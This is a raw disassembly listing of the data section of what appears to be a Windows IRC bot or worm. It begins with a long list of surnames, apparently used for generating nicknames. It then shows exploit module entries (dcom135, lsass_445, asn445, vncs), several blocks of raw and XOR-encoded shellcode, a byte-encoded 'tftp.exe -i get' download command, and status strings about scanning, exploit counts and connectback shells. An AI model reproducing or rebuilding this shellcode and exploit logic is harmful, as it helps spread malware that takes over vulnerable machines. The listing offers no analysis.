aCavanagh db 'Cavanagh',0 ; DATA XREF: .data:0042DCB0�o
align 4
aCastelda db 'Castelda',0 ; DATA XREF: .data:0042DCAC�o
align 4
aCaspar db 'Caspar',0 ; DATA XREF: .data:0042DCA8�o
align 4
aCase db 'Case',0 ; DATA XREF: .data:0042DCA4�o
align 4
aCascio db 'Cascio',0 ; DATA XREF: .data:0042DCA0�o
align 4
aCartmill db 'Cartmill',0 ; DATA XREF: .data:0042DC9C�o
align 4
aCarper db 'Carper',0 ; DATA XREF: .data:0042DC98�o
align 10h
aCaroti db 'Caroti',0 ; DATA XREF: .data:0042DC94�o
align 4
aCarmichael db 'Carmichael',0 ; DATA XREF: .data:0042DC90�o
align 4
aCarlyle db 'Carlyle',0 ; DATA XREF: .data:0042DC8C�o
aCarlos db 'Carlos',0 ; DATA XREF: .data:0042DC88�o
align 4
aCarlin db 'Carlin',0 ; DATA XREF: .data:0042DC84�o
align 4
aCarayannopoulo db 'Carayannopoulos',0 ; DATA XREF: .data:0042DC80�o
aCaratozzolo db 'Caratozzolo',0 ; DATA XREF: .data:0042DC7C�o
aCapursi db 'Capursi',0 ; DATA XREF: .data:0042DC78�o
aCappuccio db 'Cappuccio',0 ; DATA XREF: .data:0042DC74�o
align 4
aCapodilupo db 'Capodilupo',0 ; DATA XREF: .data:0042DC70�o
align 4
aCapocaccia db 'Capocaccia',0 ; DATA XREF: .data:0042DC6C�o
align 4
aCaperton db 'Caperton',0 ; DATA XREF: .data:0042DC68�o
align 10h
aCapanni db 'Capanni',0 ; DATA XREF: .data:0042DC64�o
aCanley db 'Canley',0 ; DATA XREF: .data:0042DC60�o
align 10h
aCammilleri db 'Cammilleri',0 ; DATA XREF: .data:0042DC5C�o
align 4
aCammelli db 'Cammelli',0 ; DATA XREF: .data:0042DC58�o
align 4
aCalnan db 'Calnan',0 ; DATA XREF: .data:0042DC54�o
align 10h
aCage db 'Cage',0 ; DATA XREF: .data:0042DC50�o
align 4
aByrd db 'Byrd',0 ; DATA XREF: .data:0042DC4C�o
align 10h
aByerly db 'Byerly',0 ; DATA XREF: .data:0042DC48�o
align 4
aByatt db 'Byatt',0 ; DATA XREF: .data:0042DC44�o
align 10h
aBusetta db 'Busetta',0 ; DATA XREF: .data:0042DC40�o
aBurridge db 'Burridge',0 ; DATA XREF: .data:0042DC3C�o
align 4
aBurke db 'Burke',0 ; DATA XREF: .data:0042DC38�o
align 4
aBurdzy db 'Burdzy',0 ; DATA XREF: .data:0042DC34�o
align 4
aBurden db 'Burden',0 ; DATA XREF: .data:0042DC30�o
align 4
aBunton db 'Bunton',0 ; DATA XREF: .data:0042DC2C�o
align 4
aBullard db 'Bullard',0 ; DATA XREF: .data:0042DC28�o
aBudding db 'Budding',0 ; DATA XREF: .data:0042DC24�o
aBuchan db 'Buchan',0 ; DATA XREF: .data:0042DC20�o
align 4
aBrzycki db 'Brzycki',0 ; DATA XREF: .data:0042DC1C�o
aBrook db 'Brook',0 ; DATA XREF: .data:0042DC18�o
align 4
aBroca db 'Broca',0 ; DATA XREF: .data:0042DC14�o
align 4
aBritz db 'Britz',0 ; DATA XREF: .data:0042DC10�o
align 4
aBrinton db 'Brinton',0 ; DATA XREF: .data:0042DC0C�o
aBridges db 'Bridges',0 ; DATA XREF: .data:0042DC08�o
aBridgeman db 'Bridgeman',0 ; DATA XREF: .data:0042DC04�o
align 4
aBrewer db 'Brewer',0 ; DATA XREF: .data:0042DBFC�o
; .data:0042DC00�o
align 10h
aBrennan db 'Brennan',0 ; DATA XREF: .data:0042DBF8�o
aBrenan db 'Brenan',0 ; DATA XREF: .data:0042DBF4�o
align 10h
aBreed db 'Breed',0 ; DATA XREF: .data:0042DBF0�o
align 4
aBrecht db 'Brecht',0 ; DATA XREF: .data:0042DBEC�o
align 10h
aBradach db 'Bradach',0 ; DATA XREF: .data:0042DBE8�o
aBradac db 'Bradac',0 ; DATA XREF: .data:0042DBE4�o
align 10h
aBracalente db 'Bracalente',0 ; DATA XREF: .data:0042DBE0�o
align 4
aBoyne db 'Boyne',0 ; DATA XREF: .data:0042DBDC�o
align 4
aBoym db 'Boym',0 ; DATA XREF: .data:0042DBD8�o
align 4
aBoyland db 'Boyland',0 ; DATA XREF: .data:0042DBD4�o
aBoyes db 'Boyes',0 ; DATA XREF: .data:0042DBD0�o
align 4
aBoyajian db 'Boyajian',0 ; DATA XREF: .data:0042DBCC�o
align 4
aBoxer db 'Boxer',0 ; DATA XREF: .data:0042DBC8�o
align 10h
aBowers db 'Bowers',0 ; DATA XREF: .data:0042DBC4�o
align 4
aBourneuf db 'Bourneuf',0 ; DATA XREF: .data:0042DBC0�o
align 4
aBoudrot db 'Boudrot',0 ; DATA XREF: .data:0042DBBC�o
aBoudin db 'Boudin',0 ; DATA XREF: .data:0042DBB8�o
align 4
aBotosh db 'Botosh',0 ; DATA XREF: .data:0042DBB4�o
align 4
aBothman db 'Bothman',0 ; DATA XREF: .data:0042DBB0�o
aBossi db 'Bossi',0 ; DATA XREF: .data:0042DBAC�o
align 4
aBorden db 'Borden',0 ; DATA XREF: .data:0042DBA8�o
align 4
aBorack db 'Borack',0 ; DATA XREF: .data:0042DBA4�o
align 4
aBoorstin db 'Boorstin',0 ; DATA XREF: .data:0042DBA0�o
align 4
aBoone db 'Boone',0 ; DATA XREF: .data:0042DB9C�o
align 10h
aBookbinder db 'Bookbinder',0 ; DATA XREF: .data:0042DB98�o
align 4
aBook db 'Book',0 ; DATA XREF: .data:0042DB94�o
align 4
aBontempo db 'Bontempo',0 ; DATA XREF: .data:0042DB90�o
align 10h
aBoniface db 'Boniface',0 ; DATA XREF: .data:0042DB8C�o
align 4
aBonham db 'Bonham',0 ; DATA XREF: .data:0042DB88�o
align 4
aBoner db 'Boner',0 ; DATA XREF: .data:0042DB84�o
align 4
aBologna db 'Bologna',0 ; DATA XREF: .data:0042DB80�o
aBollinger db 'Bollinger',0 ; DATA XREF: .data:0042DB7C�o
align 10h
aBolick db 'Bolick',0 ; DATA XREF: .data:0042DB78�o
align 4
aBolger db 'Bolger',0 ; DATA XREF: .data:0042DB74�o
align 10h
aBlyth db 'Blyth',0 ; DATA XREF: .data:0042DB70�o
align 4
aBloxham db 'Bloxham',0 ; DATA XREF: .data:0042DB6C�o
aBloemhof db 'Bloemhof',0 ; DATA XREF: .data:0042DB68�o
align 4
aBloembergen db 'Bloembergen',0 ; DATA XREF: .data:0042DB64�o
aBloch db 'Bloch',0 ; DATA XREF: .data:0042DB60�o
align 10h
aBlizard db 'Blizard',0 ; DATA XREF: .data:0042DB5C�o
aBliss db 'Bliss',0 ; DATA XREF: .data:0042DB58�o
align 10h
aBlanke db 'Blanke',0 ; DATA XREF: .data:0042DB54�o
align 4
aBlakemore db 'Blakemore',0 ; DATA XREF: .data:0042DB50�o
align 4
aBlagg db 'Blagg',0 ; DATA XREF: .data:0042DB4C�o
align 4
aBlackwell db 'Blackwell',0 ; DATA XREF: .data:0042DB48�o
align 4
aBlackbourn db 'Blackbourn',0 ; DATA XREF: .data:0042DB44�o
align 4
aBisho db 'Bisho',0 ; DATA XREF: .data:0042DB40�o
align 4
aBisema db 'Bisema',0 ; DATA XREF: .data:0042DB3C�o
align 4
aBir db 'Bir',0 ; DATA XREF: .data:0042DB38�o
aBinion db 'Binion',0 ; DATA XREF: .data:0042DB34�o
align 10h
aBickel db 'Bickel',0 ; DATA XREF: .data:0042DB30�o
align 4
aBiagioli db 'Biagioli',0 ; DATA XREF: .data:0042DB2C�o
align 4
aBeynart db 'Beynart',0 ; DATA XREF: .data:0042DB28�o
aBetti db 'Betti',0 ; DATA XREF: .data:0042DB24�o
align 4
aBerrizbeitia db 'Berrizbeitia',0 ; DATA XREF: .data:0042DB20�o
align 4
aBernston db 'Bernston',0 ; DATA XREF: .data:0042DB1C�o
align 10h
aBernassola db 'Bernassola',0 ; DATA XREF: .data:0042DB18�o
align 4
aBernardo db 'Bernardo',0 ; DATA XREF: .data:0042DB14�o
align 4
aBerkeJenkins db 'Berke-Jenkins',0 ; DATA XREF: .data:0042DB10�o
align 4
aBergson db 'Bergson',0 ; DATA XREF: .data:0042DB0C�o
aBenedictDye db 'Benedict-Dye',0 ; DATA XREF: .data:0042DB08�o
align 10h
aBelloc db 'Belloc',0 ; DATA XREF: .data:0042DB04�o
align 4
aBellini db 'Bellini',0 ; DATA XREF: .data:0042DB00�o
aBellhouse db 'Bellhouse',0 ; DATA XREF: .data:0042DAFC�o
align 4
aBellavance db 'Bellavance',0 ; DATA XREF: .data:0042DAF8�o
align 4
aBelinCollart db 'Belin-Collart',0 ; DATA XREF: .data:0042DAF4�o
align 4
aBelfer db 'Belfer',0 ; DATA XREF: .data:0042DAF0�o
align 10h
aBelaoussof db 'Belaoussof',0 ; DATA XREF: .data:0042DAEC�o
align 4
aBelanger db 'Belanger',0 ; DATA XREF: .data:0042DAE8�o
align 4
aBehenna db 'Behenna',0 ; DATA XREF: .data:0042DAE4�o
aBedford db 'Bedford',0 ; DATA XREF: .data:0042DAE0�o
aBeder db 'Beder',0 ; DATA XREF: .data:0042DADC�o
align 10h
aBeckman db 'Beckman',0 ; DATA XREF: .data:0042DAD8�o
aBean db 'Bean',0 ; DATA XREF: .data:0042DAD4�o
align 10h
aBeal db 'Beal',0 ; DATA XREF: .data:0042DAD0�o
align 4
aBeacon db 'Beacon',0 ; DATA XREF: .data:0042DACC�o
align 10h
aBayo db 'Bayo',0 ; DATA XREF: .data:0042DAC8�o
align 4
aBayles db 'Bayles',0 ; DATA XREF: .data:0042DAC4�o
align 10h
aBaumiller db 'Baumiller',0 ; DATA XREF: .data:0042DAC0�o
align 4
aBatchelder db 'Batchelder',0 ; DATA XREF: .data:0042DABC�o
align 4
aBashevis db 'Bashevis',0 ; DATA XREF: .data:0042DAB8�o
align 4
aBasavappa db 'Basavappa',0 ; DATA XREF: .data:0042DAB4�o
align 10h
aBartoo db 'Bartoo',0 ; DATA XREF: .data:0042DAB0�o
align 4
aBartolome db 'Bartolome',0 ; DATA XREF: .data:0042DAAC�o
align 4
aBartholomew db 'Bartholomew',0 ; DATA XREF: .data:0042DAA8�o
aBarry db 'Barry',0 ; DATA XREF: .data:0042DAA4�o
align 4
aBarriola db 'Barriola',0 ; DATA XREF: .data:0042DAA0�o
align 4
aBarnett db 'Barnett',0 ; DATA XREF: .data:0042DA9C�o
aBarneson db 'Barneson',0 ; DATA XREF: .data:0042DA98�o
align 4
aBarbetti db 'Barbetti',0 ; DATA XREF: .data:0042DA94�o
align 4
aBarberi db 'Barberi',0 ; DATA XREF: .data:0042DA90�o
aBaranowska db 'Baranowska',0 ; DATA XREF: .data:0042DA8C�o
align 4
aBaranczak db 'Baranczak',0 ; DATA XREF: .data:0042DA88�o
align 4
aBarajas db 'Barajas',0 ; DATA XREF: .data:0042DA84�o
aBarabesi db 'Barabesi',0 ; DATA XREF: .data:0042DA80�o
align 4
aBanta db 'Banta',0 ; DATA XREF: .data:0042DA7C�o
align 10h
aBaltz db 'Baltz',0 ; DATA XREF: .data:0042DA78�o
align 4
aBallew db 'Ballew',0 ; DATA XREF: .data:0042DA74�o
align 10h
aBallatori db 'Ballatori',0 ; DATA XREF: .data:0042DA70�o
align 4
aBaleja db 'Baleja',0 ; DATA XREF: .data:0042DA6C�o
align 4
aBakanowsky db 'Bakanowsky',0 ; DATA XREF: .data:0042DA68�o
align 10h
aBailar db 'Bailar',0 ; DATA XREF: .data:0042DA64�o
align 4
aBagnold db 'Bagnold',0 ; DATA XREF: .data:0042DA60�o
aBaglivo db 'Baglivo',0 ; DATA XREF: .data:0042DA5C�o
aBady db 'Bady',0 ; DATA XREF: .data:0042DA58�o
align 10h
aBackus db 'Backus',0 ; DATA XREF: .data:0042DA54�o
align 4
aBachmuth db 'Bachmuth',0 ; DATA XREF: .data:0042DA50�o
align 4
aAzima db 'Azima',0 ; DATA XREF: .data:0042DA4C�o
align 4
aAyling db 'Ayling',0 ; DATA XREF: .data:0042DA48�o
align 4
aAykroyd db 'Aykroyd',0 ; DATA XREF: .data:0042DA44�o
aAyiemba db 'Ayiemba',0 ; DATA XREF: .data:0042DA40�o
aAxworthy db 'Axworthy',0 ; DATA XREF: .data:0042DA3C�o
align 10h
aAxelrod db 'Axelrod',0 ; DATA XREF: .data:0042DA38�o
aAurelius db 'Aurelius',0 ; DATA XREF: .data:0042DA34�o
align 4
aAugustus db 'Augustus',0 ; DATA XREF: .data:0042DA30�o
align 10h
aAtkins db 'Atkins',0 ; DATA XREF: .data:0042DA2C�o
align 4
aArky db 'Arky',0 ; DATA XREF: .data:0042DA28�o
align 10h
aArjas db 'Arjas',0 ; DATA XREF: .data:0042DA24�o
align 4
aAristotle db 'Aristotle',0 ; DATA XREF: .data:0042DA20�o
align 4
aArellano db 'Arellano',0 ; DATA XREF: .data:0042DA1C�o
align 10h
aArduini db 'Arduini',0 ; DATA XREF: .data:0042DA18�o
aArbia db 'Arbia',0 ; DATA XREF: .data:0042DA14�o
align 10h
aAntos db 'Antos',0 ; DATA XREF: .data:0042DA10�o
align 4
aAnthony db 'Anthony',0 ; DATA XREF: .data:0042DA0C�o
aAnsley db 'Ansley',0 ; DATA XREF: .data:0042DA08�o
align 4
aAnfinrud db 'Anfinrud',0 ; DATA XREF: .data:0042DA04�o
align 4
aAndron db 'Andron',0 ; DATA XREF: .data:0042DA00�o
align 4
aAndrelus db 'Andrelus',0 ; DATA XREF: .data:0042D9FC�o
align 4
aAndo db 'Ando',0 ; DATA XREF: .data:0042D9F8�o
align 10h
aAndel db 'Andel',0 ; DATA XREF: .data:0042D9F4�o
align 4
aAnand db 'Anand',0 ; DATA XREF: .data:0042D9F0�o
align 10h
aAmsden db 'Amsden',0 ; DATA XREF: .data:0042D9EC�o
align 4
aAmeer db 'Ameer',0 ; DATA XREF: .data:0042D9E8�o
align 10h
aAmatangelo db 'Amatangelo',0 ; DATA XREF: .data:0042D9E4�o
align 4
aAmaral db 'Amaral',0 ; DATA XREF: .data:0042D9E0�o
align 4
aAltenhofen db 'Altenhofen',0 ; DATA XREF: .data:0042D9DC�o
align 10h
aAltenberger db 'Altenberger',0 ; DATA XREF: .data:0042D9D8�o
aAltavilla db 'Altavilla',0 ; DATA XREF: .data:0042D9D4�o
align 4
aAlongi db 'Alongi',0 ; DATA XREF: .data:0042D9D0�o
align 10h
aAllison db 'Allison',0 ; DATA XREF: .data:0042D9CC�o
aAleks db 'Aleks',0 ; DATA XREF: .data:0042D9C8�o
align 10h
aAlda db 'Alda',0 ; DATA XREF: .data:0042D9C4�o
align 4
aAlcorn db 'Alcorn',0 ; DATA XREF: .data:0042D9C0�o
align 10h
aAlavi db 'Alavi',0 ; DATA XREF: .data:0042D9BC�o
align 4
aAhlers db 'Ahlers',0 ; DATA XREF: .data:0042D9B8�o
align 10h
aAdorno db 'Adorno',0 ; DATA XREF: .data:0042D9B4�o
align 4
aAdibe db 'Adibe',0 ; DATA XREF: .data:0042D9B0�o
align 10h
aAdelstein db 'Adelstein',0 ; DATA XREF: .data:0042D9AC�o
align 4
aAddison db 'Addison',0 ; DATA XREF: .data:off_42D9A8�o
aAdams db 'Adams',0 ; DATA XREF: .data:0042D9A4�o
align 4
aAckerman db 'Ackerman',0 ; DATA XREF: .data:0042D9A0�o
align 4
aAbdulrazak db 'Abdulrazak',0 ; DATA XREF: .data:off_42D99C�o
align 4
byte_4315F4 db 50h ; DATA XREF: .text:0040ABE6�o
; .text:0040ABF3�r
db 43h, 2 dup(0)
dword_4315F8 dd 7C7325h ; DATA XREF: .text:0040AC91�o
aS_0 db '[%s]|',0 ; DATA XREF: .text:0040AD9B�o
align 4
a??? db '???',0 ; DATA XREF: .text:loc_40AD92�o
; sub_41AF8F:loc_41B052�o
a2k3 db '2K3',0 ; DATA XREF: .text:0040AD8B�o
aXp db 'XP',0 ; DATA XREF: .text:0040AD7D�o
; .text:0040AF89�o ...
align 10h
a2k db '2K',0 ; DATA XREF: .text:0040AD6D�o
; .text:0040AF79�o ...
align 4
aMe_0 db 'ME',0 ; DATA XREF: .text:0040AD54�o
; .text:0040AF60�o ...
align 4
a98 db '98',0 ; DATA XREF: .text:0040AD44�o
; .text:0040AF50�o ...
align 4
aNt_0 db 'NT',0 ; DATA XREF: .text:0040AD34�o
; .text:0040AF41�o ...
align 10h
a95 db '95',0 ; DATA XREF: .text:0040AD26�o
; .text:0040AF33�o ...
align 4
; char aDS[]
aDS db '[%d]%s',0 ; DATA XREF: sub_40ADE1+3A�o
align 4
; char aM[]
aM db '[M]',0 ; DATA XREF: sub_40ADE1+2C�o
; sub_40ADE1+57�o
aMirc_0 db 'mIRC',0 ; DATA XREF: sub_40ADE1+18�o
; sub_41875E+5�o
align 4
aSSSS_0 db '%s|%s|%s|%s|',0 ; DATA XREF: .text:0040B0D6�o
align 4
a99 db '99',0 ; DATA XREF: .text:loc_40B098�o
align 4
a0D db '0%d',0 ; DATA XREF: .text:0040B072�o
; char aDdDhDm[]
aDdDhDm db '%dd %dh %dm',0 ; DATA XREF: .text:0040B054�o
; sub_41ADD8+52�o
off_43165C dd offset byte_4B4E55 ; DATA XREF: .text:0040B037�o
dword_431660 dd 345053h ; DATA XREF: .text:0040B02D�o
dword_431664 dd 34h ; DATA XREF: .text:0040B021�o
dword_431668 dd 335053h ; DATA XREF: .text:0040B014�o
dword_43166C dd 33h ; DATA XREF: .text:0040B003�o
dword_431670 dd 325053h ; DATA XREF: .text:0040AFF6�o
dword_431674 dd 32h ; DATA XREF: .text:0040AFE5�o
dword_431678 dd 315053h ; DATA XREF: .text:0040AFD8�o
dword_43167C dd 305053h ; DATA XREF: .text:0040AFBA�o
dword_431680 dd 4E55h ; DATA XREF: .text:loc_40AF9E�o
dword_431684 dd 3332h ; DATA XREF: .text:0040AF97�o
dword_431688 dd 5EB02EBh, 0FFFFF9E8h, 0C9315BFFh ; DATA XREF: sub_40B2B3+C4�o
db 66h, 0B9h
word_431696 dw 0FFFFh ; DATA XREF: sub_40B2B3+CC�w
db 80h, 73h, 0Eh
byte_43169B db 0FFh ; DATA XREF: sub_40B2B3+D3�w
dd 0F9E243h
dword_4316A0 dd 5EB02EBh, 0FFFFF9E8h, 0C9315BFFh ; DATA XREF: sub_40B2B3+A2�o
db 0B1h
byte_4316AD db 0FFh ; DATA XREF: sub_40B2B3+AA�w
dw 7380h
db 0Ch
byte_4316B1 db 0FFh ; DATA XREF: sub_40B2B3+B0�w
dw 0E243h
dd 0F9h
dword_4316B8 dd 364C033h, 0C783040h, 8B0C408Bh, 8BAD1C70h, 9EB0840h
; DATA XREF: sub_40B13C+57�o
dd 8D34408Bh, 408B7C40h, 3D08B3Ch, 0CA8B3C40h, 8B784803h
dd 0DA8B2041h, 331C5903h, 57F633FFh, 3CA8B57h, 7981100Ch
dd 7373650Ah, 8B027541h, 3798133h, 72685474h, 3B8B0275h
dd 8304C083h, 0F68504C3h, 0FF85DB74h, 0F203D774h, 0E857FA03h
dword_43171C dd 12h ; DATA XREF: sub_40B13C+3D�w
dd 70746674h, 6578652Eh, 20692D20h
aGet db ' get ',0 ; DATA XREF: sub_40B13C+79�o
; sub_40B13C+9B�o
aJ_0 db 'j',0
db 0E8h
dword_431735 dd 17h ; DATA XREF: sub_40B13C+4D�w
db 75h, 1, 0C3h
db 0E8h
dword_43173D dd 1 ; DATA XREF: sub_40B13C+45�w
byte_431741 db 0, 6Ah, 0 ; DATA XREF: sub_40B13C+C2�o
dd 7E8h
db 0, 0Fh, 84h
dword_43174B dd 0FFFFFFEDh ; DATA XREF: sub_40B13C+5D�w
db 0C3h
dd 505D5B58h, 3354EC83h, 8DFC8BC0h, 0D78B4048h, 44B0AAF3h
dd 515257ABh, 6A286A51h, 55515101h, 83D6FF53h, 0C08554C4h
dd 0C3h
dword_43177C dd 234032Dh, 65726874h, 6C206461h, 2747369h, 202D03h
; DATA XREF: sub_40B477+10�o
; char aSNoSThreadFoun[]
aSNoSThreadFoun db '%s No %s thread found.',0 ; DATA XREF: sub_40B648+51�o
align 4
; char aSSStopped_DThr[]
aSSStopped_DThr db '%s %s stopped. (%d thread(s) stopped.)',0 ; DATA XREF: sub_40B648+35�o
align 10h
aSym db 'sym',0 ; DATA XREF: sub_40C3E8+169�o
dd 0
db 2 dup(0)
aSymantec db 'Symantec',0 ; DATA XREF: sub_40BA9E+30�o
; .text:0040E229�o ...
align 4
dd 5 dup(0)
dword_4317F8 dd 0B97h ; DATA XREF: sub_401ACD+1D42�r
; sub_401ACD+1D6A�o ...
off_4317FC dd offset sub_40EAE9 ; DATA XREF: sub_40C3E8+1EA�r
dword_431800 dd 0 ; DATA XREF: sub_40B90E+2E�o
; .text:0040D759�w ...
dword_431804 dd 1 ; DATA XREF: sub_40BD91+1F�r
dword_431808 dd 1 ; DATA XREF: sub_40BD91+3B3�r
dword_43180C dd 0 ; DATA XREF: sub_40BD91+292�r
aDcom135 db 'dcom135',0
dd 63440000h, 33316D6Fh, 35h, 5 dup(0)
dd 87h, 40DF4Ch, 0
dd 1, 2 dup(0)
dd 636E76h, 0
dd 6E760000h, 63h, 6 dup(0)
dd 170Ch, 40EC1Fh, 0
dd 2 dup(1), 0
aAsn445 db 'asn445',0
align 4
dd 53410000h, 2D312E4Eh, 424D53h, 5 dup(0)
dd 1BDh, 40D59Dh, 0
dd 2 dup(1), 0
aAsn139 db 'asn139',0
align 4
dd 53410000h, 2D312E4Eh, 20424D53h, 544Eh, 4 dup(0)
dd 8Bh, 40D59Dh, 0
dd 2 dup(1), 0
aVncs db 'vncs',0
align 4
dd 54480000h, 562D5054h, 434Eh, 5 dup(0)
dd 170Ch, 41B6A1h, 4 dup(0)
aLsass_445 db 'lsass_445',0
aLsass_445_0 db 'lsass_445',0
dd 5 dup(0)
dd 1BDh, 40E830h, 0
dd 2 dup(1), 2 dup(0)
dd 10100h, 0Eh dup(0)
aAsn445_0 db 'asn445',0
align 4
db 2 dup(0)
byte_4319DA db 1 ; DATA XREF: sub_401ACD:loc_403789�r
; sub_401ACD+1CC6�o
aDcom135_0 db 'dcom135',0
align 4
dd 100h, 3 dup(0)
dd 4A5A10EBh, 0B966C933h, 34800166h, 0FAE2990Ah, 0EBE805EBh
dd 70FFFFFFh, 99999899h, 699521C3h, 9912E664h, 3485E912h
dd 1291D912h, 0A5EA1241h, 0EF126A9Ah, 126A9AE1h, 629AB9E7h
dd 0AA8DD712h, 0C8CECF74h, 629AA612h, 97F36B12h, 0ED3F6AC0h
dd 1AC6C091h, 7BDC9D5Eh, 0C7C6C070h, 0DF125412h, 485A9ABDh
dd 0AA589A78h, 9112FF50h, 9A85DF12h, 9B78585Ah, 9912589Ah
dd 63125A9Ah, 5F1A6E12h, 0F3491297h, 0E571C09Ah, 1A999999h
dd 0CFCB945Fh, 0C365CE66h, 9DF34112h, 99F071C0h, 0C9C99999h
dd 98F3C9C9h, 0CE669BF3h, 5E411269h, 9E999B9Eh, 1059AA24h
dd 89F39DDEh, 0CE66CACEh, 0CA98F36Dh, 0C961CE66h, 0CE66CAC9h
dd 0DD751A65h, 42AA6D12h, 10C089F3h, 627B1785h, 10A1DF10h
dd 0DF10A5DFh, 0B5DF5ED9h, 99999898h, 0C989DE14h, 0CACACACFh
dd 0CACA98F3h, 0FAA5DE5Eh, 1499FDF4h, 0CAC9A5DEh, 0C97DCE66h
dd 0AA71CE66h, 591C3559h, 0CBC860ECh, 4B66CACFh, 7B32C0C3h
dd 5A59AA77h, 66676271h, 0EDFCDE66h, 0FAF6EBC9h, 0EBFDFDD8h
dd 99EAEAFCh, 0F8FCEBDAh, 0EBC9FCEDh, 0EAFCFAF6h, 0DC99D8EAh
dd 0C9EDF0E1h, 0FCFAF6EBh, 0D599EAEAh, 0D5FDF8F6h, 0F8EBFBF0h
dd 99D8E0EBh, 0C6ABEAEEh, 0CE99ABAAh, 0F6CAD8CAh, 0EDFCF2FAh
dd 0F0FB99D8h, 0F599FDF7h, 0FCEDEAF0h, 0FAF899F7h, 0EDE9FCFAh
dd 99h
; char aTotalDInS_[]
aTotalDInS_ db ' Total: %d in %s.',0 ; DATA XREF: sub_40B90E+86�o
align 4
; char asc_431B88[]
asc_431B88 db ' ' ; DATA XREF: sub_40B90E+46�o
db 3, 37h, 25h
dd 203A0373h, 2C6425h
; char asc_431B94[]
asc_431B94 db '-' ; DATA XREF: sub_40B90E+11�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aExploitStatist db 'Exploit Statistics:',0
; char asc_431BB4[]
asc_431BB4 db '-' ; DATA XREF: sub_40B9DD+38�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
db 54h ; T
db 72h, 61h, 6Eh
db 73h ; s
db 66h, 65h, 72h
db 20h
db 53h, 74h, 61h
db 74h ; t
db 69h, 73h, 74h
db 69h ; i
db 63h, 73h, 3Ah
db 20h
db 2, 54h, 46h
db 54h ; T
db 50h, 2, 3Ah
db 20h
db 25h, 64h, 2Ch
db 20h
db 2, 46h, 54h
db 50h ; P
db 2, 3Ah, 20h
aDTotalDInS_ db '%d, Total %d in %s.',0
; char asc_431BFC[]
asc_431BFC db '-' ; DATA XREF: sub_40BA49+22�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aDConnectbackSh db '%d connectback shells in %s.',0
align 4
; char aScanTimeS_[]
aScanTimeS_ db ' Scan Time: %s.',0 ; DATA XREF: sub_40BA9E+7F�o
; char asc_431C38[]
asc_431C38 db ' ' ; DATA XREF: sub_40BA9E+40�o
db 3, 37h, 25h
dd 28200373h, 73253403h, 2C2903h
; char asc_431C48[]
asc_431C48 db '-' ; DATA XREF: sub_40BA9E+14�o
db 3, 34h, 2
dd 6E616373h, 202D0302h, 6C707845h, 2074696Fh, 7473694Ch
dd 3Ah
; char asc_431C64[]
asc_431C64 db '-' ; DATA XREF: sub_40BB65+172�o
db 3, 34h, 2
db 65h ; e
db 78h, 70h, 6Ch
db 6Fh ; o
db 69h, 74h, 2
db 3
aFinishedExploi db '- finished exploiting %s (%d attempts)',0
; char asc_431C98[]
asc_431C98 db '-' ; DATA XREF: sub_40BB65+80�o
db 3, 34h, 2
db 65h ; e
db 78h, 70h, 6Ch
db 6Fh ; o
db 69h, 74h, 2
db 3
db 2Dh, 20h, 74h
db 72h ; r
db 79h, 69h, 6Eh
db 67h ; g
db 20h, 2, 25h
db 73h ; s
db 2, 20h, 6Fh
aNSPortD___ db 'n %s (port %d)...',0
align 4
; char asc_431CC8[]
asc_431CC8 db '-' ; DATA XREF: sub_40BD1A+42�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aScanNotActive_ db 'Scan not active.',0
align 4
; char asc_431CE8[]
asc_431CE8 db '-' ; DATA XREF: sub_40BD1A+2C�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aCurrentIpS_ db 'Current IP: %s.',0
; char asc_431D04[]
asc_431D04 db '-' ; DATA XREF: sub_40BD91+4B7�o
db 3, 34h, 2
db 68h ; h
db 2 dup(74h), 70h
db 64h ; d
db 2, 3, 2Dh
aFailedToSta_30 db ' Failed to start server, error: <%d>.',0
align 4
; char asc_431D38[]
asc_431D38 db '-' ; DATA XREF: sub_40BD91+38F�o
db 3, 34h, 2
db 63h ; c
db 6Fh, 2 dup(6Eh)
db 65h ; e
db 63h, 74h, 62h
db 61h ; a
db 63h, 6Bh, 2
db 3
aFailedToSta_31 db '- Failed to start server, error: <%d>.',0
; char asc_431D70[]
asc_431D70 db '-' ; DATA XREF: sub_40BD91+321�o
db 3, 34h, 2
db 63h ; c
db 6Fh, 2 dup(6Eh)
db 65h ; e
db 63h, 74h, 62h
db 61h ; a
db 63h, 6Bh, 2
db 3
aServerStarte_2 db '- Server started on Port: %d.',0
align 10h
; char asc_431DA0[]
asc_431DA0 db '-' ; DATA XREF: sub_40BD91+26C�o
db 3, 34h, 2
db 66h ; f
db 74h, 70h, 64h
db 2
db 3, 2Dh, 20h
aFailedToSta_32 db 'Failed to start server, error: <%d>.',0
align 4
; char asc_431DD4[]
asc_431DD4 db '-' ; DATA XREF: sub_40BD91+1FE�o
db 3, 34h, 2
db 66h ; f
db 74h, 70h, 64h
db 2
db 3, 2Dh, 20h
aServerStarte_3 db 'Server started on Port: %d, File: %s.',0
align 4
; char asc_431E08[]
asc_431E08 db '-' ; DATA XREF: sub_40BD91+148�o
db 3, 34h, 2
db 74h ; t
db 66h, 74h, 70h
db 64h ; d
db 2, 3, 2Dh
aFailedToSta_33 db ' Failed to start server, error: <%d>.',0
align 4
; char asc_431E3C[]
asc_431E3C db '-' ; DATA XREF: sub_40C3E8+EE�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aIpSPortDIsOpen db 'IP: %s, Port %d is open.',0
align 4
; char asc_431E64[]
asc_431E64 db '-' ; DATA XREF: sub_40C3E8+93�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aIpSDScanThread db 'IP: %s:%d, Scan thread: %d, Sub-thread: %d.',0
; char asc_431E9C[]
asc_431E9C db '-' ; DATA XREF: sub_40C600+1CE�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aFinishedAtSDAf db 'Finished at %s:%d after %d minute(s) of scanning.',0
align 4
; char asc_431EDC[]
asc_431EDC db '-' ; DATA XREF: sub_40C600+173�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
